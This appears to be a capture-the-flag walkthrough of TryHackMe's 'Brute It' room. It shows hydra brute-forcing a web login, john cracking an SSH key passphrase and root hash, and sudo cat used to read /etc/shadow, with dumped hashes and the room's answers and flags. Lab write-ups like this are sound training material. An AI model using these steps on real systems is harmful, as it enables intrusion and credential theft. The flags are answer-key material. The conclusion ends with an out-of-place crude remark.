Tryhackme – Brute It

In this walk through, we will be going through the Brute It room from Tryhackme. This room covers basics enumeration and cracking passwords and hashes on every step, followed by a simple privilege escalation vector to get the root. So, let’s crack into it.

Machine Info:

Task 1 – About this box

Task 2 – Reconnaissance

Before attacking, let’s get information about the target

Search for open ports using nmap.

wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.41.167 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-04-28 19:59 IST

Host is up (0.25s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.70 seconds

Question 1 – How many ports are open?

2

Question 2 – What version of SSH is running?

OpenSSH 7.6p1

Question 3 – What version of Apache is running?

2.4.29

Question 4 – Which Linux distribution is running?

Ubuntu

Question 5 – What is the hidden directory?

• Use gobuster to reveal the hidden directory by using the following command.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.41.167/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.41.167/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/28 20:04:22 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/admin                (Status: 301) [Size: 312] [--> http://10.10.41.167/admin/]
/index.html           (Status: 200) [Size: 10918]                               
/server-status        (Status: 403) [Size: 277]                                 
                                                                                
===============================================================
2023/04/28 20:06:11 Finished
===============================================================

/admin

Task 3 – Getting a shell

Find a form to get a shell on SSH.

Question 1 – What is the user:password of the admin panel?

• On the port 80, i found an admin panel. Diving into the source code gives we the username – admin.

• Further, I captured the post request to the server using Burpsuite. It gives me the password field the application is using and the error it throws in case of an incorrect input.

• Next i used hydra to bruteforce the web password for the user admin.

wh1terose@fsociety:~$ hydra -l admin -P ~/Desktop/Wordlist/rockyou.txt 10.10.41.167 http-post-form "/admin/:user=^USER^&pass=^PASS^:Username or password invalid"
Hydra v9.5-dev (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-28 20:19:10
[DATA] max 16 tasks per 1 server, overall 16 tasks, 15000 login tries (l:1/p:15000), ~938 tries per task
[DATA] attacking http-post-form://10.10.41.167:80/admin/:user=^USER^&pass=^PASS^:Username or password invalid
[80][http-post-form] host: 10.10.41.167   login: admin   password: xavier
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-28 20:19:49

admin:xavier

Question 2 – What is John’s RSA Private Key passphrase?

• Logging into the admin panel gives us a SSH private key. Copying it our local machine and converting it to john crackable format using ssh2john. Firing up john on the converted hash gives us the password for the private key.

wh1terose@fsociety:~/CTF/TryHackme/Brute it$ ssh2john.py id_rsa > john.hash

wh1terose@fsociety:~/CTF/TryHackme/Brute it$ ~/Tools/john/run/john john.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:00 DONE 1/3 (2023-04-28 20:47) 0g/s 703750p/s 703750c/s 703750C/s Rsaid_rsa1900..Rid1900
Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst
Enabling duplicate candidate password suppressor
rockinroll       (id_rsa)     
1g 0:00:00:00 DONE 2/3 (2023-04-28 20:47) 6.666g/s 1713Kp/s 1713Kc/s 1713KC/s 062285..north5
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
wh1terose@fsociety:~/CTF/TryHackme/Brute it$ 

rockinroll

Question 3 – user.txt

• Getting our initial access with SSH results in getting the user flag.

THM{a_password_is_not_a_barrier}

Question 4 – Web flag

THM{brut3_f0rce_is_e4sy}

Task 4 – Privilege Escalation

Now, we need to escalate our privileges.

Question 1 – What is the root’s password?

• First i started with dumping the contents of /etc/passwd and /etc/shadow file to my local machine.

john@bruteit:/etc$ LFILE=/etc/shadow
john@bruteit:/etc$ sudo /bin/cat "$LFILE"
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7:::
sshd:*:18489:0:99999:7:::
john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::
john@bruteit:/etc$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

.... Snipped ....

• Next, use unshadow on the dumped files to get a final hash file which then can be used to crack the root password using john.

wh1terose@fsociety:~/CTF/TryHackme/Brute it$ unshadow passwd.txt shadow.txt > finalhash.txt
wh1terose@fsociety:~/CTF/TryHackme/Brute it$ ~/Tools/john/run/john finalhash.txt 
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:01 DONE 1/3 (2023-04-28 21:08) 0g/s 8222p/s 8228c/s 8228C/s Thmthm1900..Rthm1900
Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst
Enabling duplicate candidate password suppressor
football         (root)     

[1]+  Stopped                 ~/Tools/john/run/john finalhash.txt

football

Question 2 – root.txt

• Finally we leverages sudo misconfigurations with the help of GTFObins for the “cat” binary to reveals the root flag.

john@bruteit:/$ sudo -l
Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat
john@bruteit:/$ LFILE=/root/root.txt
john@bruteit:/$ sudo /bin/cat "$LFILE"
THM{pr1v1l3g3_3sc4l4t10n}
john@bruteit:/$ 

THM{pr1v1l3g3_3sc4l4t10n}

Also Read: Tryhackme – Bounty Hacker

Conclusion:

So that was the “Brute It” room for you. Man, it has lot of bruteforcing and cracking. So let’s sum it up quickly. First we started with an nmap scan, found two major services running – HTTP and SSH. Next, on the web portal found the username in the source code and then used Burpsuite to capture the post request in order to later bruteforce the web panel password using hydra. After accessing the web panel, we found a SSH private key. Dumping it into our local machine and cracking it with john gives us our initial access via SSH. Post getting the user flag, we migrate to the privilege escalation phase where we first crack root password with john by unshadowing the /etc/shadow and /etc/passwd file. The sudo misconfiguration in the cat binary reveals the final root flag and the cleavage of your neighbor next door.